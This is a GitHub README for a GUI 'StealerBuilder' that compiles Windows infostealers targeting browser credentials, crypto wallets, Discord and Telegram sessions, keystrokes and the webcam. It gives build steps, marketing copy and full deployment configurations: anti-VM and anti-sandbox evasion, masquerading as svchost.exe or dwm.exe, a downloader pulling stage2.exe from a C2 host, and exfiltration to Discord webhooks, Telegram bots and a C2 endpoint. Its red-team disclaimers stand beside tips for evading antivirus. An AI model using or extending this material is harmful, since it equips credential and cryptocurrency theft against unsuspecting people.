Skip to content

sankha-ghosh/Browser-Data-Grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

543 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ₯· Stealer - Windows 10/11

The Ultimate Data Extraction & Payload Generation Tool

Build powerful Windows stealers with advanced anti-detection capabilities

Professional-grade malware builder for red team operations and penetration testing


License Platform Features Anti-Detection Build Status Version


🎯 Quick Navigation

Quick Start Features Installation Usage


⚠️ LEGAL WARNING & DISCLAIMER

🚨 THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY 🚨

πŸ”΄ CRITICAL NOTICE: This software is designed exclusively for legal, authorized security testing purposes.


βœ… Intended Use Cases

🎯 Penetration Testing

  • Authorized engagements
  • Written permission required
  • Scope-defined testing

πŸ”΄ Red Team Operations

  • Client authorization
  • Controlled environments
  • Professional assessments

πŸ”¬ Security Research

  • Controlled lab environments
  • Academic institutions
  • Authorized studies

πŸŽ“ Educational Use

  • Academic settings
  • Training programs
  • Learning purposes

πŸ›‘οΈ USE ETHICALLY β€’ USE RESPONSIBLY β€’ USE LEGALLY πŸ›‘οΈ


πŸ“‹ Table of Contents

πŸš€ Getting Started

πŸ“– Advanced Topics

πŸ‘₯ Community

πŸ“š Resources


⭐ Why Choose Stealer Builder?

🎯 Professional-Grade Features

  • 50+ Stealer Capabilities - Comprehensive data extraction
  • Advanced Anti-Detection - Evade modern security solutions
  • Cross-Platform Builder - Linux β†’ Windows compilation
  • One-Click Generation - No coding required
  • Real-Time Exfiltration - Instant data delivery

πŸ₯· Stealth & Evasion

  • Hidden Execution - Completely invisible to users
  • Process Masquerading - Disguise as system processes
  • VM Detection - Evade virtual environments
  • Sandbox Evasion - Bypass automated analysis
  • Anti-Debugging - Prevent reverse engineering

πŸ” Target Capabilities

  • Browser Credentials - Chrome, Firefox, Edge, Brave
  • Crypto Wallets - Exodus, Atomic, Electrum, MetaMask
  • Communication Apps - Discord, Telegram, WhatsApp
  • System Intelligence - HWID, processes, antivirus
  • Visual Surveillance - Screenshots, webcam, clipboard

πŸ“€ Delivery Methods

  • Discord Webhooks - Instant data delivery
  • Telegram Bots - Secure bot-based transmission
  • HTTP POST - Custom endpoint delivery
  • Email SMTP - Direct email transmission
  • FTP Upload - File-based exfiltration

⚑ Performance & Reliability

  • Lightning Fast - Optimized C++ performance
  • Zero Dependencies - Statically linked executables
  • Cross-Platform - Works on Linux and Windows
  • Professional GUI - Intuitive tabbed interface
  • Regular Updates - Continuous improvements

πŸ’Ž Stealer Capabilities

πŸ” Browser Credential Harvesting

🌐 Complete Browser Data Extraction

  • Chrome/Chromium: Passwords, cookies, autofill, bookmarks, history
  • Firefox: Master passwords, saved logins, session data
  • Microsoft Edge: Complete profile data extraction
  • Brave Browser: Full credential harvesting
  • Opera: Password and session extraction

πŸ”“ Advanced Decryption

  • DPAPI Integration: Automatic Windows credential decryption
  • SQLite Database Parsing: Direct browser database access
  • Session Token Extraction: Live authentication tokens
  • Cookie Stealing: Complete session hijacking capability

πŸ’° Cryptocurrency Wallet Targeting

  • Exodus Wallet: Private keys and seed phrases
  • Atomic Wallet: Complete wallet data extraction
  • Electrum: Wallet files and private keys
  • MetaMask: Browser extension wallet data
  • Coinbase Wallet: Mobile and web wallet access

πŸ’¬ Communication Platform Infiltration

  • Discord: Token extraction and account takeover
  • Telegram: Session files and contact lists
  • WhatsApp: Database and media extraction
  • Signal: Message database access

πŸ₯· Advanced Anti-Detection Features

πŸ‘» Stealth Operations

  • Hidden Execution: Completely invisible to users
  • Process Masquerading: Disguise as legitimate Windows processes
  • Single Instance Control: Mutex-based execution prevention
  • Self-Destruction: Automatic cleanup after execution
  • Registry Persistence: Optional startup persistence

🚫 Virtual Environment Detection

  • VMware Detection: Complete VMware environment identification
  • VirtualBox Detection: VirtualBox-specific detection methods
  • QEMU Detection: QEMU/KVM virtualization detection
  • Hyper-V Detection: Microsoft virtualization platform detection
  • Sandboxie Detection: Sandbox environment identification

πŸ›‘οΈ Analysis Evasion

  • Anti-Debugging: Multiple debugger detection methods
  • Sandbox Evasion: Cuckoo, Any.run, and custom sandbox detection
  • Timing Attacks: Sleep evasion and timing-based detection
  • Hardware Fingerprinting: CPU and hardware-based VM detection
  • Network Analysis: Virtual network adapter detection

πŸ” Code Protection

  • String Obfuscation: XOR-based string encryption
  • UPX Packing: Executable compression and obfuscation
  • Custom Icons: Legitimate-looking executable appearance
  • Static Linking: Zero external dependencies

πŸ“€ Data Exfiltration Methods

🌐 Multiple Exfiltration Channels

  • Discord Webhooks: Instant data delivery to Discord channels
  • HTTP POST: Custom endpoint data transmission
  • Telegram Bots: Secure bot-based data delivery
  • Email SMTP: Direct email data transmission
  • FTP Upload: File-based data exfiltration

πŸ“Š System Intelligence Gathering

  • Hardware Fingerprinting: Unique system identification
  • Network Information: IP addresses and network configuration
  • Installed Software: Complete software inventory
  • Running Processes: Real-time process enumeration
  • Antivirus Detection: Security software identification

πŸ“Έ Visual Intelligence

  • Desktop Screenshots: Complete screen capture
  • Webcam Access: Camera-based surveillance
  • Clipboard Monitoring: Real-time clipboard data theft
  • Keystroke Logging: Complete keyboard input capture
  • File System Monitoring: Real-time file access tracking

πŸ”„ Payload Delivery

  • Download & Execute: Remote payload fetching and execution
  • Staged Payloads: Multi-stage attack capabilities
  • Persistence Mechanisms: Long-term system access
  • Lateral Movement: Network propagation capabilities

πŸš€ Quick Start

⚑ Get Started in 3 Simple Steps

🐧 Ubuntu/Debian
# Update package list
sudo apt-get update

# Install Qt6 and build tools
sudo apt-get install -y \
    build-essential \
    cmake \
    qt6-base-dev \
    qt6-base-dev-tools

# Install MinGW for cross-compilation
sudo apt-get install -y mingw-w64

# [Optional] Install UPX for executable packing
sudo apt-get install -y upx-ucl
🎩 Fedora/RHEL/CentOS
# Install Qt6 and build tools
sudo dnf install -y \
    gcc-c++ \
    cmake \
    qt6-qtbase-devel

# Install MinGW for cross-compilation
sudo dnf install -y \
    mingw64-gcc \
    mingw64-gcc-c++

# [Optional] Install UPX for executable packing
sudo dnf install -y upx
πŸ”οΈ Arch Linux
# Install Qt6 and build tools
sudo pacman -S \
    base-devel \
    cmake \
    qt6-base

# Install MinGW for cross-compilation
sudo pacman -S mingw-w64-gcc

# [Optional] Install UPX for executable packing
sudo pacman -S upx
πŸͺŸ Windows

Required:

  1. CMake (3.16+)

  2. Qt6

  3. C++ Compiler (choose one):

Optional: 4. UPX (for packing)


πŸ”¨ Building the GUI Application

Quick Build (Recommended)

The automated build scripts handle everything including font downloads:

πŸ› οΈ Step-by-Step Setup

1️⃣ Install Dependencies

# Ubuntu/Debian
sudo apt-get install build-essential cmake qt6-base-dev mingw-w64

# Fedora/RHEL  
sudo dnf install gcc-c++ cmake qt6-qtbase-devel mingw64-gcc

# Arch Linux
sudo pacman -S base-devel cmake qt6-base mingw-w64-gcc

2️⃣ Build the Tool

chmod +x build.sh
./build.sh

3️⃣ Launch & Create

./build/bin/StealerBuilder

🎯 What You Get

βœ… Professional Features

  • 🎨 Professional GUI - Intuitive tabbed interface
  • ⚑ One-Click Building - Generate Windows executables instantly
  • πŸ”§ Advanced Features - 50+ stealer capabilities
  • πŸ₯· Anti-Detection - Built-in evasion techniques
  • 🌐 Cross-Platform - Works on Linux and Windows

⚑ Ready to Use

  • πŸš€ No complex configuration needed
  • πŸ” Automatic compiler detection
  • πŸ“ Embedded fonts included
  • πŸ“‹ Example configurations provided

πŸŽ‰ Success!

Your professional stealer builder is ready to create powerful Windows payloads!


πŸ› οΈ Installation

Automated Installation (Recommended)

The build scripts handle everything automatically:

🐧 Linux Installation

# One command installation
sudo apt-get update && sudo apt-get install -y \
    build-essential cmake qt6-base-dev mingw-w64 upx-ucl

# Build the application
chmod +x build.sh && ./build.sh

πŸͺŸ Windows Installation

# Download and install:
# 1. CMake from cmake.org
# 2. Qt6 from qt.io
# 3. Visual Studio 2019+ or MinGW-w64

# Build the application
build.bat

βœ… What's Included

  • Qt6 Framework: Modern GUI toolkit
  • MinGW-w64: Cross-compilation to Windows
  • CMake: Build system automation
  • UPX: Executable packing (optional)
  • Fonts: Embedded Liberation fonts

🎯 Ready to Use

  • Automatic dependency detection
  • Font download included
  • Cross-platform compatibility
  • Professional GUI interface

πŸ”¨ Building & Usage

One-Click Build Process

🐧 Linux Build

# Simple one-command build
chmod +x build.sh && ./build.sh

# Launch the application
./build/bin/StealerBuilder

πŸͺŸ Windows Build

# Automated build process
build.bat

# Launch the application
build\bin\Release\StealerBuilder.exe

⚑ What Happens

  1. Dependency Check - Verifies all required tools
  2. Font Download - Automatically downloads Liberation fonts
  3. Code Generation - Creates optimized C++ source
  4. Compilation - Builds Windows PE executable
  5. Ready to Use - Launches the GUI application

🎯 Output

  • Linux: build/bin/StealerBuilder
  • Windows: build\bin\Release\StealerBuilder.exe
  • Generated Payloads: build/output.exe

πŸš€ Usage

Professional Stealer Creation in Minutes

🎯 Step 1: Launch & Configure

# Launch the application
./build/bin/StealerBuilder

βš™οΈ Step 2: Select Your Targets

  • πŸ” Browser Credentials: Chrome, Firefox, Edge, Brave
  • πŸ’° Crypto Wallets: Exodus, Atomic, Electrum, MetaMask
  • πŸ’¬ Communication: Discord, Telegram, WhatsApp
  • πŸ“Š System Data: HWID, IP, processes, antivirus
  • πŸ“Έ Visual Intel: Screenshots, webcam, clipboard

πŸ₯· Step 3: Enable Stealth

  • Hidden Execution: Completely invisible to users
  • Process Masquerading: Disguise as system processes
  • Anti-VM Detection: Evade virtual environments
  • Anti-Debugging: Prevent analysis attempts

πŸ“€ Step 4: Choose Exfiltration

  • Discord Webhooks: Instant data delivery
  • Telegram Bots: Secure bot-based transmission
  • HTTP POST: Custom endpoint delivery
  • Email SMTP: Direct email transmission

πŸ”¨ Step 5: Build & Deploy

  • One-Click Build: Generate Windows executable
  • UPX Packing: Compress and obfuscate
  • Custom Icons: Legitimate appearance
  • Architecture: x86/x64 support

βœ… Ready to Deploy

Your professional-grade stealer is ready for red team operations!

🎨 Intuitive Tabbed Interface

πŸ“₯ Downloader

  • Remote payload fetching
  • Environment variable support
  • Silent execution parameters
  • Staged attack capabilities

🌐 Grabber

  • Complete browser data extraction
  • Cryptocurrency wallet targeting
  • Communication platform infiltration
  • Advanced decryption capabilities

πŸ“€ Exfiltration

  • Multiple delivery channels
  • Encrypted data transmission
  • Real-time data streaming
  • Secure communication protocols

πŸ₯· Stealth

  • Hidden execution modes
  • Process name spoofing
  • Registry persistence
  • Self-destruction options

πŸ›‘οΈ Anti-Analysis

  • Virtual machine detection
  • Sandbox environment evasion
  • Debugger attachment prevention
  • Timing-based evasion

βš™οΈ Build Options

  • Architecture selection
  • String obfuscation
  • Executable packing
  • Custom icon embedding

πŸ“ Real-World Stealer Configurations

🎯 Professional Configuration Examples

🏒 Example 1: Corporate Credential Harvesting

🎯 Target Profile

  • Environment: Corporate networks with multiple browsers
  • Users: Business professionals with various communication apps
  • Security Level: Standard corporate security measures
{
  "grabber": {
    "chrome": true,
    "firefox": true,
    "edge": true,
    "discord": true,
    "telegram": true
  },
  "exfiltration": {
    "webhook": "https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN"
  },
  "systemInfo": {
    "hwid": true,
    "ip": true,
    "os": true,
    "av": true,
    "processes": true
  },
  "stealth": {
    "hideConsole": true,
    "processName": "svchost.exe",
    "mutex": "Global\\WindowsUpdate"
  },
  "antiAnalysis": {
    "vm": true,
    "sandbox": true,
    "debug": true
  },
  "buildOptions": {
    "architecture": "x64",
    "obfuscate": true,
    "upx": true
  }
}

πŸ’‘ Use Case

Penetration Testing: Assess credential security across browsers and messaging apps in corporate environments

πŸ’° Example 2: Cryptocurrency Wallet Targeting

🎯 Target Profile

  • Environment: High-value cryptocurrency users
  • Users: Crypto traders and investors
  • Security Level: Advanced personal security measures
{
  "grabber": {
    "wallets": ["exodus", "atomic", "electrum", "metamask"],
    "chrome": true,
    "firefox": true
  },
  "exfiltration": {
    "telegram": {
      "token": "YOUR_BOT_TOKEN",
      "chatId": "YOUR_CHAT_ID"
    }
  },
  "screenshots": {
    "desktop": true
  },
  "systemInfo": {
    "hwid": true,
    "ip": true,
    "os": true
  },
  "stealth": {
    "hideConsole": true,
    "processName": "explorer.exe",
    "selfDestruct": true
  },
  "antiAnalysis": {
    "vm": true,
    "sandbox": true,
    "debug": true,
    "sleepEvasion": true
  },
  "buildOptions": {
    "architecture": "x64",
    "obfuscate": true,
    "upx": true,
    "icon": "wallet.ico"
  }
}

πŸ’‘ Use Case

Red Team Assessment: Evaluate crypto wallet security and user awareness in high-value environments

πŸ₯· Example 3: Advanced Persistent Threat (APT) Simulation

🎯 Target Profile

  • Environment: Enterprise networks requiring comprehensive data gathering
  • Users: High-value targets with extensive digital footprints
  • Security Level: Advanced enterprise security with EDR/XDR
{
  "downloader": {
    "url": "https://c2.example.com/stage2.exe",
    "savePath": "%APPDATA%\\Microsoft\\Windows\\update.exe",
    "execParams": "--silent --background"
  },
  "grabber": {
    "chrome": true,
    "firefox": true,
    "edge": true,
    "brave": true,
    "discord": true,
    "telegram": true,
    "wallets": ["exodus", "atomic", "electrum", "metamask"]
  },
  "exfiltration": {
    "webhook": "https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN",
    "http": "https://your-c2-server.com/api/data"
  },
  "screenshots": {
    "desktop": true
  },
  "systemInfo": {
    "hwid": true,
    "ip": true,
    "os": true,
    "av": true,
    "processes": true
  },
  "stealth": {
    "hideConsole": true,
    "processName": "dwm.exe",
    "mutex": "Global\\WindowsShell",
    "selfDestruct": false
  },
  "antiAnalysis": {
    "vm": true,
    "sandbox": true,
    "debug": true,
    "sleepEvasion": true
  },
  "buildOptions": {
    "architecture": "x64",
    "obfuscate": true,
    "upx": true,
    "icon": "system.ico"
  }
}

πŸ’‘ Use Case

Full-Spectrum Red Team: Comprehensive enterprise engagement with persistent access capabilities


πŸ”„ Cross-Compilation Notes

Linux β†’ Windows Cross-Compilation

The builder automatically detects and uses MinGW-w64 for cross-compilation on Linux:

Component Value
Compiler x86_64-w64-mingw32-g++ (x64) / i686-w64-mingw32-g++ (x86)
Output Format Windows PE executable
Linking Static (no DLL dependencies)
Runtime Statically linked libgcc/libstdc++

Testing Generated Executables

Since payloads are Windows PE files, testing options:

βœ… Recommended: Windows VM (VirtualBox, VMware, QEMU)

  • Isolated environment
  • Full Windows API support
  • Snapshot/rollback capabilities

⚠️ Limited: Wine on Linux

  • Partial Windows API compatibility
  • May not work with all features
  • Not recommended for production testing

πŸ› οΈ Troubleshooting

❌ "No compiler found" Error

Cause: Required compiler not installed or not in PATH

Solution:

  • Linux: Install MinGW-w64
    sudo apt-get install mingw-w64  # Ubuntu/Debian
    sudo dnf install mingw64-gcc mingw64-gcc-c++  # Fedora
    sudo pacman -S mingw-w64-gcc  # Arch
  • Windows: Install Visual Studio 2019+ or MinGW-w64
    • Ensure compiler is added to system PATH
    • Restart application after installation
πŸ”§ Compilation Errors

Common Issues:

  1. Outdated Compiler

    • Requires GCC 7+ or MSVC 2019+
    • Check version: g++ --version or cl /?
  2. Missing Windows SDK (Windows only)

    • Install Visual Studio with "Desktop development with C++"
    • Or install Windows SDK separately
  3. UPX Packing Fails

    • Try building without UPX first
    • Ensure UPX is installed and in PATH
    • Check UPX version: upx --version

Debug Steps:

# Check compiler availability
x86_64-w64-mingw32-g++ --version  # Linux
g++ --version  # Windows MinGW
cl /?  # Windows MSVC

# Try minimal build without extras
# Disable: UPX packing, obfuscation, custom icon
🚫 Generated Executable Doesn't Run

Expected Behavior:

  • ⚠️ Antivirus/Windows Defender may flag the executable
  • This varies based on configuration and evasion settings

Solutions:

  1. Antivirus Interference

    • Add exclusion in Windows Defender if needed
    • Test in isolated VM for controlled testing
    • Configure evasion techniques for better stealth
  2. Architecture Mismatch

    • Verify target system architecture
    • x86 executables run on x64 Windows
    • x64 executables only run on x64 Windows
  3. Missing Dependencies

    • Ensure static linking is enabled
    • Check build logs for linking errors

Testing Environment:

  • Use clean Windows 10/11 VM
  • Take snapshot before testing
  • Monitor with Process Monitor/Procmon
πŸ“€ Exfiltration Not Working

Webhook Issues:

  1. Invalid Webhook URL

    • Verify URL format: https://discord.com/api/webhooks/{id}/{token}
    • Test webhook manually: curl -X POST <webhook_url> -H "Content-Type: application/json" -d '{"content":"test"}'
  2. Network Connectivity

    • Check target has internet access
    • Verify firewall isn't blocking outbound HTTPS
    • Try different exfiltration method (HTTP POST vs Discord vs Telegram)
  3. Certificate Issues

    • Ensure valid SSL certificate on endpoint
    • Use HTTPS (not HTTP) for webhooks

Telegram Bot Issues:

  • Verify bot token is valid
  • Ensure chat ID is correct (use @userinfobot to get ID)
  • Bot must have started conversation with user
πŸ–₯️ Qt Application Issues

Application Won't Start:

  • Ensure Qt6 is properly installed
  • Check LD_LIBRARY_PATH includes Qt libs (Linux)
  • Verify all fonts were downloaded successfully

Font Rendering Issues:

  • Run font download script manually:
    cd fonts && ./download_fonts.sh && cd ..
  • Rebuild application after font download

πŸ—οΈ Architecture

GUI Application (C++/Qt6)

StealerBuilder (GUI)
β”œβ”€β”€ MainWindow: Tabbed configuration interface
β”œβ”€β”€ CompilerManager: Detect and manage compilers
β”œβ”€β”€ StubGenerator: Generate C++ source from config
β”œβ”€β”€ Builder: Invoke compiler with proper flags
└── Config: Load/save JSON configurations

Generated Stub (C++/WinAPI)

stub.exe (Windows PE)
β”œβ”€β”€ Anti-Analysis: VM/sandbox/debug detection
β”œβ”€β”€ Downloader: URLDownloadToFile + ShellExecute
β”œβ”€β”€ Browser Grabber: SQLite + DPAPI decryption
β”œβ”€β”€ System Info: WinAPI system information
β”œβ”€β”€ Screenshots: GDI+ screen capture
└── Exfiltration: WinHTTP POST to webhook/endpoint

πŸ’» Development

Project Structure

stealer-gui/
β”œβ”€β”€ πŸ“„ CMakeLists.txt           # CMake build configuration
β”œβ”€β”€ πŸ“„ README.md                # This documentation
β”œβ”€β”€ πŸ“„ ARCHITECTURE.md          # Detailed architecture docs
β”œβ”€β”€ πŸ“„ LICENSE                  # License file
β”œβ”€β”€ πŸ“„ example_config.json      # Example configuration
β”‚
β”œβ”€β”€ πŸ”¨ build.sh                 # Linux build script
β”œβ”€β”€ πŸ”¨ build.bat                # Windows build script
β”œβ”€β”€ πŸ“„ resources.qrc            # Qt resource file (fonts, icons)
β”‚
β”œβ”€β”€ πŸ“ src/                     # Source code
β”‚   β”œβ”€β”€ πŸ“„ main.cpp             # Application entry point
β”‚   β”‚
β”‚   β”œβ”€β”€ πŸ“ ui/                  # User interface
β”‚   β”‚   β”œβ”€β”€ mainwindow.h
β”‚   β”‚   └── mainwindow.cpp      # Main window & tabs
β”‚   β”‚
β”‚   β”œβ”€β”€ πŸ“ config/              # Configuration
β”‚   β”‚   β”œβ”€β”€ config.h
β”‚   β”‚   └── config.cpp          # JSON serialization
β”‚   β”‚
β”‚   β”œβ”€β”€ πŸ“ generator/           # Code generation
β”‚   β”‚   β”œβ”€β”€ stubgenerator.h
β”‚   β”‚   └── stubgenerator.cpp   # C++ stub generation
β”‚   β”‚
β”‚   └── πŸ“ compiler/            # Compiler management
β”‚       β”œβ”€β”€ compilermanager.h
β”‚       β”œβ”€β”€ compilermanager.cpp
β”‚       β”œβ”€β”€ builder.h
β”‚       └── builder.cpp
β”‚
β”œβ”€β”€ πŸ“ fonts/                   # Embedded fonts
β”‚   β”œβ”€β”€ download_fonts.sh
β”‚   β”œβ”€β”€ download_fonts.bat
β”‚   └── *.ttf                   # Liberation fonts
β”‚
└── πŸ“ build/                   # Build output (generated)
    └── bin/
        └── StealerBuilder      # Compiled executable

Tech Stack

Component Technology Purpose
GUI Framework Qt 6 Cross-platform interface
Build System CMake 3.16+ Build orchestration
Language C++17 Application logic
Serialization JSON Configuration storage
Target Output C++/WinAPI Generated payloads

Adding New Features

Step-by-Step Guide

1. Update Configuration Schema (src/config/config.h)

struct Config {
    // Existing fields...
    
    // Add new feature configuration
    bool enableNewFeature;
    std::string newFeatureSetting;
};

2. Add UI Controls (src/ui/mainwindow.cpp)

// In MainWindow constructor or tab creation
QCheckBox* newFeatureCheckbox = new QCheckBox("Enable New Feature");
QLineEdit* newFeatureInput = new QLineEdit();

// Add to layout
layout->addWidget(newFeatureCheckbox);
layout->addWidget(newFeatureInput);

// Connect signals
connect(newFeatureCheckbox, &QCheckBox::stateChanged, 
        this, &MainWindow::onNewFeatureChanged);

3. Implement Code Generation (src/generator/stubgenerator.cpp)

QString StubGenerator::generate(const Config& config) {
    QString sourceCode;
    
    // Add includes if needed
    if (config.enableNewFeature) {
        sourceCode += "#include <new_header.h>\n";
    }
    
    // Add implementation
    if (config.enableNewFeature) {
        sourceCode += R"(
void newFeatureFunction() {
    // Feature implementation
}
)";
    }
    
    return sourceCode;
}

4. Update JSON Serialization (src/config/config.cpp)

// Save
QJsonObject Config::toJson() const {
    QJsonObject json;
    json["enableNewFeature"] = enableNewFeature;
    json["newFeatureSetting"] = QString::fromStdString(newFeatureSetting);
    return json;
}

// Load
void Config::fromJson(const QJsonObject& json) {
    enableNewFeature = json["enableNewFeature"].toBool();
    newFeatureSetting = json["newFeatureSetting"].toString().toStdString();
}

5. Rebuild & Test

cd build
cmake --build .
./bin/StealerBuilder  # Test your changes

Build System Details

The project uses CMake with the following key features:

  • Qt6 Integration: Automatic MOC, UIC, RCC processing
  • Resource Embedding: Fonts and icons embedded via resources.qrc
  • Cross-Platform: Supports Linux, Windows (MSVC/MinGW)
  • Static Linking: Generated payloads have no external dependencies

πŸ”’ Security Considerations

For Red Team Operators

βœ… Best Practices

  • Authorization First

    • Obtain written permission before deployment
    • Define scope and boundaries clearly
    • Document authorized targets
  • Secure Operations

    • Use HTTPS for all exfiltration
    • Encrypt sensitive data in transit
    • Test in isolated lab environments first
  • Documentation

    • Log all systems accessed
    • Document payload deployment
    • Track configuration used
  • Cleanup

    • Remove payloads after engagement
    • Delete exfiltrated test data
    • Provide detailed remediation report

⚠️ Risk Awareness

  • Legal Risks

    • Unauthorized use is illegal
    • May violate CFAA, GDPR, etc.
    • Criminal and civil penalties apply
  • Technical Risks

    • Payloads will be detected by AV/EDR
    • May trigger incident response
    • Network monitoring will log activity
  • Ethical Risks

    • Only use for authorized testing
    • Respect privacy and data protection
    • Follow responsible disclosure

Detection Considerations

This tool generates executables that may be detected by security solutions:

Security Solution Detection Method Likelihood
Windows Defender Signature + Behavioral 🟑 Medium
Commercial AV Signature + Heuristic 🟑 Medium
EDR Systems Behavioral Analysis 🟑 Medium
Sandboxes Dynamic Analysis 🟒 Low-Medium
Network IDS/IPS Traffic Patterns 🟒 Low

Note: Detection rates vary based on configuration and target environment. The tool includes evasion techniques but is designed for authorized testing scenarios.

Evasion Techniques

The tool includes various evasion features for red team scenarios:

Included Techniques
  1. String Obfuscation

    • XOR encoding of sensitive strings
    • Runtime decryption
    • Effectiveness: Moderate
  2. Anti-Debugging

    • IsDebuggerPresent() checks
    • Remote debugger detection
    • Effectiveness: Moderate
  3. Anti-VM Detection

    • Registry key checks
    • CPUID instruction analysis
    • Effectiveness: Good
  4. Anti-Sandbox

    • Sleep evasion techniques
    • Timing checks
    • Effectiveness: Moderate
  5. Stealth Features

    • Hidden console window
    • Process name spoofing
    • Effectiveness: Good

Note: These techniques are designed for red team engagements and may help bypass basic security controls in controlled testing environments.


🀝 Contributing

We welcome contributions that improve this educational red team tool!

Contribution Guidelines

βœ… Welcome Contributions

  • Code Quality

    • Bug fixes
    • Performance improvements
    • Code refactoring
    • Better error handling
  • Features

    • Legitimate red team/pentest capabilities
    • Additional evasion techniques (educational)
    • New payload features
    • UI/UX improvements
  • Documentation

    • README improvements
    • Code comments
    • Architecture documentation
    • Usage examples

❌ Rejected Contributions

  • Malicious Intent

    • Features solely for illegal use
    • Backdoors or hidden functionality
    • Unethical capabilities
  • Poor Quality

    • Unmaintainable code
    • Missing documentation
    • Breaking changes without discussion

How to Contribute

  1. Fork the Repository
  2. Create a Feature Branch
    git checkout -b feature/your-feature-name
  3. Make Your Changes
    • Follow existing code style
    • Add comments where needed
    • Update documentation
  4. Test Thoroughly
    • Build on Linux and Windows (if possible)
    • Test generated executables
  5. Submit Pull Request
    • Describe your changes clearly
    • Reference any related issues
    • Explain testing performed

πŸ“œ License

This project is provided for educational and authorized security testing purposes only.

By using this software, you acknowledge and agree:

  • To use it only for legal, authorized purposes
  • That you are solely responsible for any misuse
  • That the authors assume no liability for damages or illegal use

See LICENSE file for full details.


βš–οΈ Disclaimer

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

THE AUTHORS ARE NOT RESPONSIBLE FOR ANY MISUSE, DAMAGE, OR ILLEGAL ACTIVITY
CAUSED BY THIS PROGRAM.

USE AT YOUR OWN RISK.

Intended Use Cases

βœ… Authorized Use ❌ Prohibited Use
Penetration testing with written authorization Unauthorized computer access
Red team engagements for clients Stealing credentials without permission
Security research in labs Deploying on production systems without consent
Educational purposes in academic settings Commercial malware development
Testing detection capabilities Any illegal activity

⚠️ UNAUTHORIZED USE IS ILLEGAL AND UNETHICAL ⚠️


πŸ“š Resources

Red Team & Penetration Testing

Security Tools & Frameworks

Learning Resources


πŸ’¬ Support & Contact

Get Help

Issue Type Solution
πŸ”§ Compilation Errors Check Troubleshooting section
πŸ–₯️ Qt/CMake Issues Verify installation via Prerequisites
πŸ” Compiler Detection Ensure MinGW-w64/MSVC is in PATH
πŸ’‘ Feature Requests Open an issue on the repository
πŸ› Bug Reports Open an issue with reproduction steps
πŸ”’ Security Concerns Report privately to maintainers

Community

  • Issues: Use GitHub Issues for bug reports and feature requests
  • Discussions: For questions and general discussion
  • Pull Requests: For code contributions

🎯 Ready to Build Professional Stealers?

⚑ Get Started Today

# Clone and build in minutes
git clone https://github.com/your-repo/stealer-gui
cd stealer-gui
chmod +x build.sh && ./build.sh
./build/bin/StealerBuilder

πŸš€ What Happens Next?

1️⃣ Configure

  • Select your targets
  • Enable stealth features
  • Choose exfiltration method

2️⃣ Build

  • One-click generation
  • Advanced obfuscation
  • Professional output

3️⃣ Deploy

  • Windows PE executable
  • Ready for red team ops
  • Professional results

πŸŽ‰ Join the Community

πŸ‘₯ Connect With Us

  • GitHub: Star ⭐ and contribute
  • Issues: Report bugs & request features
  • Discussions: Share knowledge & tips

πŸ“š Learn More

  • Documentation: Comprehensive guides
  • Examples: Real-world configurations
  • Tutorials: Step-by-step walkthroughs

πŸ›‘οΈ Final Reminder

βš–οΈ Legal & Ethical Guidelines

With great power comes great responsibility.

This tool is a double-edged sword - use it to defend, not attack.

Always obtain authorization. Always act ethically. Always follow the law.


πŸ† Built for Professionals

Built for red teamers, by security professionals.

Stay legal. Stay ethical. Stay secure.

About

Stealer for Windows 10/11 for Chrome, Edge, Firefox, Brave with Wallet, Discord, Telegram and many more functions. Passwords, cookies, autofills, payments, etc.

Topics

Resources

License

Stars

Watchers

Forks

Packages